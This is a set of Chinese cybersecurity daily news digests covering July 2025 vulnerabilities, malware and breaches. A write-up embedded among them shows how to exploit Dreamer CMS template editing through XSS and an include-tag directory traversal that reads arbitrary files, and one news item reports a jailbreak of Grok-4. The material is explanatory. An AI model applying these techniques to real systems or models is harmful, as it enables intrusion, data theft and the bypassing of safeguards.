网络安全日报 2025年07月15日
1、OpenVSX供应链零日漏洞影响千万开发者 https://www.bleepingcomputer.com/news/security/the-zero-day-that-couldve-compromised-every-cursor-and-windsurf-user/ 研究员披露OpenVSX扩展市场存在高危“VSXPloit”零日漏洞。攻击者可借夜间自动构建流程窃取@open-vsx发布令牌,向Cursor、Windsurf、VSCodium等千万台设备推送恶意扩展,实现无提示远程代码执行。该缺陷源自社区提交的拉取请求可在构建阶段运行任意代码,令牌因而泄露。Koi已协同Eclipse基金会完成修复,但事件再次警示开发者:扩展 2、Kigen eSIM漏洞波及20亿物联网设备 https://thehackernews.com/2025/07/esim-vulnerability-in-kigens-euicc.html 安全公司披露爱尔兰公司Kigen的eUICC卡存在严重安全缺陷。该漏洞源于GSMA TS.48通用测试配置文件6.0及更早版本,可允许攻击者在获取物理访问并掌握公开密钥后,向卡内植入恶意JavaCard小程序,进而窃取KigeneUICC身份证书。利用该证书,攻击者能够以明文形式从移动网络运营商处下载任意配置文件,篡改或植入后门,并绕过运营商监控。据Kigen官网数据,截至2020年底,已有逾20亿张物联网设备使用其eSIM。GSMA已在6月发布 3、WingFTP严重RCE漏洞遭黑客利用 https://www.bleepingcomputer.com/news/security/hackers-are-exploiting-critical-rce-flaw-in-wing-ftp-server/ 安全机构披露黑客已开始利用Wing FTP Server 7.4.3及更早版本中的CVE-2025-47812漏洞。该漏洞结合空字节与Lua注入,可让未经身份验证的远程攻击者直接以root/SYSTEM权限执行任意代码。安全研究员于6月30日公开技术细节后仅一天,监测到至少五个IP地址对暴露服务器发起大规模扫描与利用尝试,攻击者通过畸形登录请求注入恶意Lua会话文件,下载并执行远 4、LVMH集团英国客户数据失窃 https://www.theguardian.com/technology/2025/jul/11/louis-vuitton-uk-customer-data-stolen-cyber-attack 法国LVMH集团确认旗下路易威登英国系统于7月2日遭第三方入侵,部分客户姓名、联系方式及购买历史被窃,财务信息未受波及。该品牌韩国业务上周亦遇类似攻击,三个月内LVMH旗下品牌已三度中招。路易威登已向英国信息专员办公室报告,并提醒客户警惕钓鱼诈骗。 5、英国警方逮捕Scattered Spider组织嫌疑人 https://securityboulevard.com/2025/07/arrests-scattered-spider-richixbw 英国警方在黎明突袭中逮捕了四名涉嫌参与散落蜘蛛(Scattered Spider)黑客组织的嫌疑人。该组织被指控自四月以来对玛莎百货、合作社和哈罗德百货等大型零售商发动网络攻击,导致玛莎百货暂停网上服装购物近七周,损失约3亿英镑营业利润。被捕的四人包括三名男性和一名女性,年龄在17至20岁之间,分别来自英国西米德兰兹和伦敦。他们的电子设备被扣押,目前正接受国家犯罪局(NCA)的讯问。尽管警方尚未确认其与“散落蜘蛛”的直接关联,但网络安全专家认为该组织 6、Grok-4 AI上线48小时即遭新型组合越狱攻击攻破 https://www.freebuf.com/articles/ai-security/439264.html 大型语言模型Grok-4在推出仅两天后,就被研究人员通过结合"回声室(Echo Chamber)"和"渐强(Crescendo)"技术成功突破防御系统,暴露出AI安全机制存在重大缺陷。 7、热门IP摄像头存在隐蔽后门,攻击者可获取Root权限 https://securityonline.info/cve-2025-7503-cvss-10-hidden-backdoor-in-popular-ip-camera-grants-hackers-root-access/ 国内某IP摄像头存在高危漏洞(CVE-2025-7503,CVSS 10分),默认开启未公开Telnet服务,硬编码凭证可获取root权限,威胁监控画面与内网安全,暂无补丁,建议隔离网络或更换设备。 8、技嘉UEFI固件SMM漏洞使系统面临固件植入和持久控制风险 https://securityonline.info/smm-vulnerabilities-in-gigabyte-uefi-firmware-expose-systems-to-stealthy-attacks/ 技嘉UEFI固件存在4个高危SMM漏洞(CVE-2025-7026至7029),攻击者可利用漏洞在Ring -2级执行任意代码,绕过安全启动并植入持久性固件后门。技嘉已发布补丁,建议用户立即更新。 9、GPUHammer:首个针对NVIDIA GPU的Rowhammer攻击技术 https://cybersecuritynews.com/gpuhammer-attack/ 多伦多大学团队首次成功对NVIDIA显卡实施Rowhammer攻击(GPUHammer),证明GDDR6显存存在漏洞,可导致AI模型精度暴跌80%。NVIDIA建议启用ECC防护,但会牺牲性能。该漏洞凸显GPU在AI时代面临的安全风险,影响全球数百万系统。 10、Linux 内核曝高危漏洞:可UAF实现本地提权 https://securityonline.info/linux-kernel-flaw-root-privilege-escalation-via-use-after-free-poc-available/ Linux内核曝高危UAF漏洞,攻击者可利用HFSC与NETEM交互层缺陷通过恶意数据包获取root权限,PoC已公开。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年07月14日
1、MacOS.ZuRu恶意软件通过篡改Termius应用程序传播 https://www.sentinelone.com/blog/macos-zuru-resurfaces-modified-khepri-c2-hides-inside-doctored-termius-app/ 安全研究人员发现,MacOS.ZuRu后门的最新变种通过篡改的Termius应用程序传播。该恶意软件最初于2021年7月被发现,主要通过百度上的恶意网页搜索结果传播。此次攻击中,攻击者将合法的Termius应用程序木马化,通过磁盘映像(.dmg)传播。木马版本比合法版本大,因为添加了恶意二进制文件。攻击者还替换了开发者的代码签名,以绕过macOS的代码签名规则。该恶意软件使用修 2、GoldMelody攻击活动利用ASPNET漏洞入侵服务器 https://unit42.paloaltonetworks.com/initial-access-broker-exploits-leaked-machine-keys/ 研究人员发现了一个名为GoldMelody(临时编号TGR-CRI-0045)的攻击活动,该组织利用泄露的ASP.NET机器密钥,通过IIS模块的视图状态反序列化漏洞入侵服务器。攻击者通过恶意负载签名绕过保护机制,在服务器内存中直接执行代码,留下极少痕迹,增加了检测难度。此次攻击主要针对欧美地区的金融服务、制造业、高科技等行业,攻击活动自2024年10月开始,2025年初显著增加。受害者多因机器密钥泄露而被入侵。研究人 3、LogoKit网络钓鱼活动瞄准全球多目标窃取凭证 https://cyble.com/blog/logokit-being-leveraged-for-credential-theft/ 安全研究机构发现了一起利用LogoKit工具包的网络钓鱼活动,该活动通过提取品牌资产并模仿合法网站来窃取用户凭证。攻击者利用Clearbit和Google Favicon获取目标组织的徽标,增强钓鱼页面的可信度。钓鱼页面托管在Amazon S3上,使用Cloudflare Turnstile增加安全性假象。此次攻击活动已针对匈牙利政府机构、银行和物流公司等全球多个实体,攻击链接在VirusTotal上未被检测到,表明活动仍在持续进行。专家建议用户采取主动防 4、、浏览器扩展暗藏恶意劫持与监视功能 https://blog.koi.security/google-and-microsoft-trusted-them-2-3-million-users-installed-them-they-were-malware-fb4ed4f40ff5 网络安全研究团队发现一系列热门浏览器扩展程序存在恶意行为。这些扩展包括表情符号键盘、天气预报、视频速度控制器等工具,表面上提供合法功能,实则暗中监视用户浏览器活动并劫持页面。这些扩展程序通过命令和控制服务器(如admitclick.net)发送用户数据,并可能自动重定向用户到恶意页面。值得注意的是,这些扩展程序部分已在Chrome和Edge商店获得 5、Ruckus Networks管理设备多个漏洞未修复 https://www.bleepingcomputer.com/news/security/ruckus-networks-leaves-severe-flaws-unpatched-in-management-devices/ Ruckus Networks的管理设备被发现存在多个严重漏洞,但截至目前仍未修复。这些漏洞影响Ruckus Wireless Virtual SmartZone (vSZ) 和Ruckus Network Director (RND),涉及未经身份验证的远程代码执行、硬编码密码、SSH密钥以及路径遍历等问题。受影响的产品广泛用于大型组织和公共实体的WiFi基础设 6、AMD发出警告新型瞬态调度程序攻击影响多款CPU https://thehackernews.com/2025/07/amd-warns-of-new-transient-scheduler.html 半导体公司AMD警告称,一种名为瞬态调度程序攻击(TSA)的新型漏洞可能影响其多款处理器,导致信息泄露。TSA是一种推测性侧信道攻击,利用CPU的微架构特性,通过指令执行时间推断数据。研究人员在对虚拟机、内核和进程等安全域进行压力测试时发现了这些问题。AMD已为受影响的处理器发布微代码更新,包括第三代至第四代EPYC处理器、Ryzen系列处理器等。攻击者需获得目标机器的访问权限才能利用这些漏洞,专家表示,TSA的利用条件是暂时的,但攻击者可能 7、mcp-remote安全漏洞可致远程代码执行 https://jfrog.com/blog/2025-6514-critical-mcp-remote-rce-vulnerability/ 安全研究团队发现mcp-remote项目存在高危漏洞CVE-2025-6514,CVSS评分达9.6。该工具常用于使大型语言模型(LLM)客户端与远程MCP服务器通信。漏洞允许攻击者在客户端连接到不受信任的MCP服务器时,触发任意操作系统命令执行,可能导致系统全面入侵。受影响版本为0.0.5至0.1.15,0.1.16版本已修复。攻击场景包括连接到恶意服务器或通过不安全方式连接被中间人攻击劫持。用户应更新至0.1.16版本或仅通过HTTPS连接受信任 8、日本新日铁公司遭零日攻击致数据泄露 https://securityaffairs.com/179766/data-breach/nippon-steel-solutions-data-breach.html 日本新日铁的子公司新日铁解决方案公司披露了一起数据泄露事件。该公司提供云和网络安全服务,但其网络设备被黑客利用零日漏洞攻击,导致数据泄露。2025年3月7日,公司检测到可疑服务器活动并隔离了受影响系统。调查显示,攻击者通过零日漏洞未经授权访问了公司内部网络,可能泄露了客户、合作伙伴和员工的个人信息,包括姓名、公司名称、职位、电子邮件地址和电话号码等。公司表示,云服务未受影响,且没有证据表明信息已在社交媒体或暗网上泄露。目 9、Fortinet发布FortiWeb SQL注入漏洞补丁 https://thehackernews.com/2025/07/fortinet-releases-patch-for-critical.html Fortinet发布针对FortiWeb中严重SQL注入漏洞(CVE-2025-25257)的修复程序。该漏洞CVSS评分为9.6,攻击者可通过精心设计的HTTP或HTTPS请求,在未授权情况下执行SQL代码或命令。受影响版本包括FortiWeb 7.6.0至7.6.3、7.4.0至7.4.7、7.2.0至7.2.10、7.0.0至7.0.10,用户需分别升级到对应更高版本。问题根源在于“get_fabric_user_by_token”函数 10、GitHub泄露APP_KEY危及600多个Laravel应用 https://thehackernews.com/2025/07/over-600-laravel-apps-exposed-to-remote.html 安全公司GitGuardian与Synacktiv联合披露,2018年至2025年5月间,GitHub公共仓库共暴露逾26万个Laravel APP_KEY,其中400个经确认有效,直接令600余个线上应用可被远程执行任意代码。泄露源六成来自被误上传的.env文件,且伴随数据库、云令牌等敏感信息;约2.8万对“APP_KEY+APP_URL”同时暴露,使攻击者可直接定位并入侵目标。该风险源于Laravel自动反序列化解密数据的机制,配合 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年07月11日
1、DoNot APT组织针对南欧政府实体发动复杂网络攻击 https://www.trellix.com/blogs/research/from-click-to-compromise-unveiling-the-sophisticated-attack-of-donot-apt-group-on-southern-european-government-entities/ 近日安全研究机构发布报告,揭露了DoNot APT组织(也称APT-C-35)针对南欧政府实体的复杂攻击活动。DoNot APT自2016年以来一直活跃,主要针对南亚和欧洲的政府机构、外交部和非政府组织,以网络间谍活动为主。此次攻击通过鱼叉式网络钓鱼电子邮件,冒充欧洲国防官员, 2、研究人员发现名为TapTrap新型Android攻击技术 https://taptrap.click/ 研究人员发现了一种名为TapTrap的新型Android攻击技术,该技术利用隐形用户界面(UI)技巧绕过Android权限系统,欺骗用户执行危险操作,例如擦除设备或授权敏感权限。与传统的tapjacking攻击不同,TapTrap可以在无需任何权限的情况下启动透明活动,覆盖在正常应用程序之上,使用户在不知情的情况下点击危险按钮。该技术由维也纳技术大学和拜罗伊特大学的研究团队开发,并将在USENIX安全研讨会上展示。研究人员分析了近10万个Play Store应用程序,发现其中76%的应用容易受到TapTrap攻击。谷歌已确认注意到该问题,并将在未 3、攻击者利用CitrixBleed 2漏洞窃取会话令牌 https://horizon3.ai/attack-research/attack-blogs/cve-2025-5777-citrixbleed-2-write-up-maybe/ 研究机构发布公告,披露了CVE-2025-5777漏洞,该漏洞被命名为CitrixBleed 2。尽管声称该漏洞与2023年的CitrixBleed(CVE-2023-4966)无关,但研究人员发现,攻击者可通过发送格式错误的HTTP请求,从NetScaler设备中窃取用户会话令牌等敏感信息。研究人员已开发出针对该漏洞的利用程序,并警告称攻击者可能已开始利用该漏洞进行攻击。专家建议用户立即应用补丁,终止所有活 4、ServiceNow新漏洞可让攻击者枚举受限数据 https://www.bleepingcomputer.com/news/security/new-servicenow-flaw-lets-attackers-enumerate-restricted-data/ ServiceNow平台被发现存在一个名为“Count(er) Strike”的漏洞,编号为CVE-2025-3648,该漏洞允许低权限用户从无权访问的表中提取敏感数据。ServiceNow是一个基于云的平台,广泛应用于公共部门、医疗保健、金融机构和大型企业。该漏洞由Varonis Threat Labs在2025年2月发现,可能影响配置错误或过于宽松的访问控制列表(ACL)。 5、玛莎百货遭社会工程学攻击引发勒索软件入侵 https://www.bleepingcomputer.com/news/security/mands-confirms-social-engineering-led-to-massive-ransomware-attack/ 玛莎百货确认其网络遭到复杂的社会工程学攻击,最终导致DragonForce勒索软件入侵。该公司董事长阿奇·诺曼在英国议会听证会上表示,攻击始于4月17日,攻击者冒充公司员工诱骗第三方重置密码,从而入侵网络。据《金融时报》报道,IT外包公司塔塔咨询服务公司可能在不知情的情况下协助了攻击者重置密码。此次攻击被认为由位于亚洲的DragonForce勒索软件团伙发起。尽管玛 6、Rockerbox税务公司服务器泄露286GB记录 https://hackread.com/rockerbox-server-tax-firm-exposed-sensitive-records/ 总部位于德克萨斯州的税收抵免咨询公司Rockerbox发生数据泄露事件,网络安全研究人员发现其服务器上有286GB数据未设密码保护,涉及245,949条记录。泄露数据包括社保号、DD214表格、财务信息、全名、出生日期、地址等敏感信息,还包含驾驶执照和与就业、税务相关的文件。此次事件可能导致身份盗窃和金融欺诈风险。虽然数据库在被发现后几天内被保护起来,但Rockerbox尚未对披露做出回应。目前尚不清楚数据暴露时间及是否有未经授权的访问。 7、Linux内核NFT子系统曝高危漏洞可导致本地提权 https://www.freebuf.com/articles/network/438686.html Linux内核的NFT(netfilter)子系统中的pipapo集合模块被发现存在严重的"双重释放"(double-free)漏洞。该高危安全缺陷允许低权限攻击者通过特制的netlink消息触发内核内存破坏,最终实现本地权限提升。 8、负鼠攻击:新型漏洞威胁TLS,可实施中间人攻击与数据注入 https://securityonline.info/opossum-attack-new-vulnerability-compromises-encrypted-tls-connections-allowing-mitm-data-injection/ 研究人员发现"负鼠攻击"漏洞,利用隐式TLS与机会型TLS共存缺陷,可破坏加密连接完整性,甚至绕过先进TLS方案。攻击者能注入恶意请求,导致资源混淆等风险。建议彻底弃用机会型TLS协议以消除隐患。 9、麦当劳AI招聘系统密码设为"123456" 致6400万求职者数据泄露 https://cybersecuritynews.com/mcdonalds-ai-hiring-bot-leaks/ 麦当劳AI招聘系统因密码"123456"等漏洞致6400万求职者信息泄露,暴露自动化招聘流程中关键网络安全缺陷,缺乏多因素认证等基本防护措施。 10、Windows Update 漏洞:通过任意文件夹删除实现 SYSTEM 权限提升 https://securityonline.info/windows-update-flaw-system-privilege-escalation-via-arbitrary-folder-deletion-poc-available/ Windows Update高危漏洞允许攻击者通过删除文件夹获取SYSTEM权限,利用符号链接缺陷突破权限隔离,威胁严重。PoC已公开。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年07月10日
1、Anatsa木马瞄准北美移动银行客户 https://www.threatfabric.com/blogs/anatsa-targets-north-america-uses-proven-mobile-campaign-process 研究人员发现Anatsa Android 银行木马正在针对北美用户发起攻击。这是该木马第三次将攻击重点放在美国和加拿大的移动银行客户上。Anatsa是一款复杂的设备接管木马,通过覆盖攻击、键盘记录等方式窃取凭证,并可直接执行欺诈交易。此次攻击活动通过Google Play商店传播,攻击者先发布合法应用,如PDF阅读器,待获得大量用户后,通过更新嵌入恶意代码。攻击期间,用户银行应用可能显示“维护” 2、恶意Pull请求入侵Ethcode VS Code扩展 https://www.reversinglabs.com/blog/malicious-pull-request-infects-vscode-extension 网络安全研究人员发现,一款名为Ethcode的VS Code扩展程序遭到恶意供应链攻击。该扩展用于以太坊智能合约开发,安装量已超6000次。攻击者通过GitHub拉取请求(PR)引入恶意代码,伪装成正常更新。此次入侵由名为Airez299的用户于2025年6月17日发起,该用户创建的唯一目的是感染代码库。恶意代码通过调用混淆的依赖项“keythereum-utils”,下载并运行恶意脚本。该脚本可能用于窃取加密资产或破坏用户开发 3、黑客滥用泄露的Shellter红队工具发起攻击 https://www.bleepingcomputer.com/news/security/hackers-abuse-leaked-shellter-red-team-tool-to-deploy-infostealers/ 黑客利用泄露的Shellter红队工具发起攻击,部署信息窃取程序。Shellter是一款用于渗透测试的商业工具,其Elite版本被黑客滥用,传播恶意软件。研究机构指出威胁行为体自4月起通过YouTube评论和网络钓鱼邮件传播恶意软件。Shellter表示,此次事件源于一名客户泄露软件副本,该公司已发布更新并限制受影响版本的分发。 4、微软紧急修复高危蠕虫级RCE漏洞 https://www.freebuf.com/articles/system/438515.html 微软已发布关键安全更新,修复编号为CVE-2025-47981的高危漏洞。该漏洞存在于SPNEGO扩展协商(NEGOEX)安全机制中,属于基于堆的缓冲区溢出漏洞,影响多个Windows和Windows Server版本。 5、大规模浏览器劫持活动,已感染超230万用户 https://www.freebuf.com/articles/es/438507.html 一场大规模浏览器劫持活动通过Google Chrome和Microsoft Edge上的18款恶意扩展程序,已感染超过230万用户。尽管这些扩展拥有认证标识和高评分,却暗中部署监控代码,引发对浏览器扩展审核机制的严重质疑。 6、Ruckus Wireless 无线设备曝出 9 个高危漏洞 https://www.freebuf.com/articles/network/438547.html 2025年7月10日- 研究人员在 Ruckus Wireless 的 Virtual SmartZone(vSZ,虚拟智能区域)和 Network Director(RND,网络管理器)产品中发现多个高危漏洞,这些漏洞对学校、医院、智慧城市和企业网络中的无线环境安全构成严重威胁。这些漏洞类型包括硬编码凭证、认证绕过和未经认证的远程代码执行(RCE,Remote Code Execution),可能导致受影响系统被完全攻陷。 7、微软365 PDF导出功能存在本地文件包含漏洞 https://www.freebuf.com/articles/database/438517.html 微软365的"导出为PDF"功能近期被发现存在严重的本地文件包含(Local File Inclusion, LFI)漏洞,攻击者可利用该漏洞获取服务器端的敏感数据,包括配置文件、数据库凭证和应用程序源代码。 8、微软远程桌面客户端漏洞可导致攻击者远程执行代码 https://www.freebuf.com/articles/system/438460.html 微软远程桌面客户端存在一个严重安全漏洞,攻击者可利用该漏洞在受害者系统上执行任意代码。该漏洞编号为CVE-2025-48817,影响多个Windows版本,对依赖远程桌面协议(RDP)连接的组织构成重大安全风险。 9、Git项目修复三大漏洞:远程代码执行、任意文件写入与缓冲区溢出 https://securityonline.info/git-project-patches-3-flaws-rce-arbitrary-file-writes-buffer-overflow/ Git修复三个高危漏洞:克隆时可远程执行代码(CVE-2025-48384)、Bundle-URI注入任意文件写入(CVE-2025-48385)和Windows凭据缓冲区溢出(CVE-2025-48386)。建议立即升级至v2.50.1或长期支持版本。 10、Zoom修复六大漏洞:全平台存在拒绝服务、信息泄露及跨站脚本风险 https://securityonline.info/zoom-patches-6-flaws-dos-info-disclosure-xss-across-all-platforms/ Zoom修复6个跨平台漏洞,涉及DoS、信息泄露和XSS风险,影响Windows、macOS、Linux、iOS和Android。严重漏洞包括Linux证书验证缺陷和Windows缓冲区溢出。建议立即升级至最新版本确保安全。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
精准定位文件包含漏洞:代码审计中的实战思维
前言 最近看到由有分析梦想 CMS 的,然后也去搭建了一个环境看了一看,发现了一个文件包含漏洞的点,很有意思,下面是详细的复现和分析,以后代码审计又多了一中挖掘文件包含漏洞的新思路。 环境搭建 下载https://gitee.com/iteachyou/dreamer_cms 然后各种配置都可以看到 JDK:Jdk8IDE:Spring Tool Suite 4(STS)或 IntelliJ IDEA DB:Mysql 5.7,Windows配置安装Mysql5.7,请参考: https://www.iteachyou.cc/article/a1db138b4a89402ab50f3499edeb30c2Redis:3.2+,Windows配置安装Redis教程,请参考: https://www.iteachyou.cc/article/4b0a638f65fa4fb1b9644cf461dba602修改一下配置文件中的 resource-path 和 mysql 的连接 漏洞寻找过程 进入后台后发现可以编辑模板文件 然后这时候我们就需要注意常见的可以触发漏洞的点了 首先就是 xss 加入我们的 xss 代码 然后访问首页 成功 xss,当然我们真实使用的话可以利用我们的 xss 平台 这里推荐与一个 https://xssaq.com/点击配置代码后会有很多 payload,随便复制一个 这里我们简单弹个 cookie xss 的话还是国外使用比较多 当然这样并不能达到我们 getshell 的目的 漏洞深入利用 这里就不得不提到我们的一些标签了 一般常见的我们可以尝试 include 标签 这里我们先复现一下 这个标签是 cms 的专属的标签 然后我们根据目录关系创建一个文件尝试一下 然后我们访问首页 可以看到成功了 调试分析 我们调试分析一下,抓个包看看路由 定位到代码 @Log(operType = OperatorType.UPDATE, module = "模板管理", content = "修改模板") @PostMapping("save") @RequiresPermissions("5n6ta53y") public String save(TemplateVo template) throws IOException, CmsException { String fileName = template.getPath() + File.separator + template.getFile(); File templateFile = new File(fileName); /** * 查询当前模版目录,判断是否为模版目录,如不是,则报错 */ Theme currentTheme = themeService.getCurrentTheme(); String resourceDir = fileConfiguration.getResourceDir(); String themePath = resourceDir + File.separator + "templates" + File.separator + currentTheme.getThemePath() + File.separator; themePath = themePath.replaceAll("\\*", "/"); File themeDir = new File(themePath); // 检查当前编辑文件是否有权限 if(!templateFile.getCanonicalPath().startsWith(themeDir.getCanonicalPath())) { throw new TemplatePermissionDeniedException(StateCodeEnum.HTTP_FORBIDDEN.getCode(), StateCodeEnum.HTTP_FORBIDDEN.getDescription(), "您没有操作权限!"); } if(!templateFile.exists()) { throw new TemplateNotFoundException(StateCodeEnum.HTTP_NOTFOUND.getCode(), StateCodeEnum.HTTP_NOTFOUND.getDescription(), "模板文件不存在!"); } String filePath = template.getPath() + File.separator + template.getFile(); filePath = filePath.replaceAll("\\*", "/"); File file = new File(filePath); FileUtils.writeStringToFile(file, template.getContent(), "UTF-8"); return "redirect:/admin/templates/toIndex"; } 这里就是就简单的写一下模板,然后重点关注解析的部分 这里有各种各样的标签 看到我们的 Include 标签 @Tag(beginTag="{dreamer-cms:include /}",endTag="{/dreamer-cms:include}",regexp="(\\{dreamer-cms:include[ \\t]+.*/\\})|(\\{dreamer-cms:include[ \\t]+.*\\}\\{/dreamer-cms:include\\})", attributes={ @Attribute(name = "file",regex = "[ \t]+file=[\"\'].*?[\"\']"), }) 格式 我们看一下解析过程 首先是解析我们的模板 识别我们的模板内容后开始解析各种标签,然后是我们的 include public String parse(String html) { Tag annotations = IncludeTag.class.getAnnotation(Tag.class); Attribute[] attributes = annotations.attributes(); List<String> all = RegexUtil.parseAll(html, annotations.regexp(), 0); if(StringUtil.isBlank(all)) { return html; } String newHtml = html; String resourceDir = fileConfiguration.getResourceDir() + "templates/"; Theme currentTheme = themeService.getCurrentTheme(); String templatePath = currentTheme.getThemePath() + "/"; String basePath = resourceDir + templatePath; for (int i = 0; i < all.size(); i++) { Map<String,Object> entity = new HashMap<String,Object>(); String includeTag = all.get(i); for (Attribute attribute : attributes) { String condition = RegexUtil.parseFirst(includeTag, attribute.regex(), 0); if(StringUtil.isBlank(condition)) { continue; } String key = condition.split("=")[0]; String value = condition.split("=")[1]; key = key.trim(); value = value.replace("\"", "").replace("\'", ""); entity.put(key, value); } if(entity.keySet() != null && entity.keySet().size() > 0) { String path = basePath + entity.get("file").toString(); File includeFile = new File(path); String includeHtml; try { includeHtml = FileUtils.readFileToString(includeFile, "UTF-8"); newHtml = newHtml.replaceFirst(annotations.regexp(), includeHtml); } catch (IOException e) { e.printStackTrace(); } } } return newHtml; } 可以目录穿越读取我们任意文件的内容
网络安全日报 2025年07月09日
1、Batavia间谍软件攻击俄罗斯组织窃取敏感数据 https://securelist.com/batavia-spyware-steals-data-from-russian-organizations/116866/ 自2024年7月以来,俄罗斯多个组织遭到名为Batavia的间谍软件攻击,攻击者通过伪装成合同文件的恶意链接,诱导用户下载并执行恶意脚本和可执行文件,从而窃取内部文件和敏感信息。该活动始于2024年7月,截至2025年7月仍在持续,攻击目标主要是俄罗斯的工业企业。攻击分为三个阶段:首先通过VBS脚本下载WebView.exe,随后WebView.exe收集系统信息并下载下一阶段的javav.exe,最终实现数据窃取和屏幕截 2、TAG-140利用DRAT V2攻击印度关键部门 https://thehackernews.com/2025/07/tag-140-deploys-drat-v2-rat-targeting.html 网络安全机构发现,与巴基斯坦以外地区有关联的黑客组织TAG-140正在利用一种名为DRAT V2的远程访问木马(RAT)攻击印度政府、国防和铁路部门。此次攻击活动通过克隆印度国防部新闻发布门户网站,诱骗用户下载恶意软件。该恶意软件通过伪造链接启动感染序列,秘密将恶意命令复制到用户剪贴板,并通过命令shell执行,从而下载并运行DRAT V2。DRAT V2是SideCopy RAT库的最新成员,具有执行任意Shell命令的功能,并通过Bas 3、ES域名恶意活动激增成为网络钓鱼攻击新宠 https://www.theregister.com/2025/07/05/spain_domains_phishing/ .es域名的恶意活动正在激增,其滥用频率已跃升至全球第三,仅次于.com和.ru域名。.es域名原本是为西班牙国家或针对西班牙语受众的网站保留的,但如今却被大量用于网络钓鱼攻击。自2025年1月截至5月,.es域名的滥用行为已有447个基础域名上的1373个子域名托管了恶意网页。其中,99%的恶意网页用于凭证网络钓鱼,1%用于分发远程访问木马(RAT)。这些恶意活动主要通过伪装成知名品牌(如微软)的电子邮件进行传播,内容通常以工作场所事务为主题,诱导用户输入凭据。尽管 4、ScriptCase漏洞致服务器存在被入侵风险 https://gbhackers.com/scriptcase-vulnerabilities/ 安全研究人员披露了流行的低代码PHP Web应用程序生成器ScriptCase中的两个严重漏洞(CVE-2025-47227和CVE-2025-47228),这些漏洞使数千台服务器面临远程代码执行和完全入侵的风险。这两个漏洞影响ScriptCase的生产环境模块,通常用于数据库和目录管理。其中,CVE-2025-47227允许攻击者通过特定HTTP请求绕过身份验证并重置管理员密码,而CVE-2025-47228则允许攻击者在登录后利用Shell注入执行任意命令。目前尚无官方修复方案,研究人员建 5、攻击者通过贿赂巴西银行员工盗窃1.4亿美元 https://www.bleepingcomputer.com/news/security/employee-gets-920-for-credentials-used-in-140-million-bank-heist/ 巴西六家银行共计损失了近1.4亿美元。攻击者通过贿赂C&M公司员工João Nazareno Roque,获取其账户凭证并利用其执行特定操作,成功入侵了与巴西中央银行连接的机密系统。Roque在此次事件中总共获得了约2770美元的非法收益,于7月3日在圣保罗被警方逮捕。此次攻击并非利用安全漏洞,而是通过社会工程学手段实现的。 6、SatanLock勒索软件宣布停止运营,称将公开所有窃取数据 https://www.freebuf.com/articles/database/438162.html 新成立的SatanLock勒索软件组织宣布即将关闭。但在消失前,该组织表示将在今日晚些时候公开从受害者处窃取的所有数据。这一声明发布在该团伙的官方Telegram频道和暗网数据泄露网站上。 7、伪装成AI工具的SEO投毒攻击瞄准8500多名中小企业用户 https://www.freebuf.com/news/438167.html 网络安全研究人员近日披露一起利用搜索引擎优化(SEO)投毒技术传播名为Oyster(又称Broomstick或CleanUpLoader)的已知木马加载器的恶意活动。此次披露正值黑客利用黑帽SEO技术操纵人工智能(AI)相关关键词搜索结果,传播Vidar、Lumma和Legion Loader等恶意软件之际。这些网站植入了JavaScript代码,可检测用户是否启用广告拦截器并收集浏览器信息,随后通过重定向链将受害者引导至托管ZIP压缩包的钓鱼页面。 8、DjVuLibre漏洞可导致Linux桌面系统代码执行 https://securityonline.info/cve-2025-53367-djvulibre-vulnerability-opens-path-to-linux-desktop-code-execution-poc-available/ DjVuLibre解码器漏洞(CVE-2025-53367,CVSS 8.4)可致Linux远程代码执行,攻击者通过伪装PDF的DjVu文件触发越界写入。Evince/Papers默认支持DjVu,AppArmor防护存在缺陷。已发布修复版本v3.5.29,建议立即升级并警惕可疑文档。 9、安全工具Shellter遭篡改事件引发漏洞披露争议 https://www.freebuf.com/articles/es/438212.html 网络安全团队近期发现,威胁攻击者正通过盗版Shellter Elite反病毒规避软件传播恶意程序。使用该商业软件检测漏洞的企业安全官(CISO)需立即升级至最新版本。这款由Shellter Project开发的工具主要用于红队测试,其11.0版本于4月16日发布,但Elastic安全实验室在4月底就监测到多起利用该软件打包信息窃取程序的攻击活动。 10、金砖国家元首签署“人工智能全球治理宣言” https://www.secrss.com/articles/80644 当地时间7月6日,在第十七次金砖国家领导人会晤期间,通过了《金砖国家领导人关于人工智能全球治理的宣言》(BRICS Leaders’ Declaration on Global Governance of Artificial Intelligence 以下简称《宣言》)。《宣言》提出了一系列指导方针,旨在推动人工智能技术的负责任开发、部署与应用,助力可持续发展和包容性增长。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年07月08日
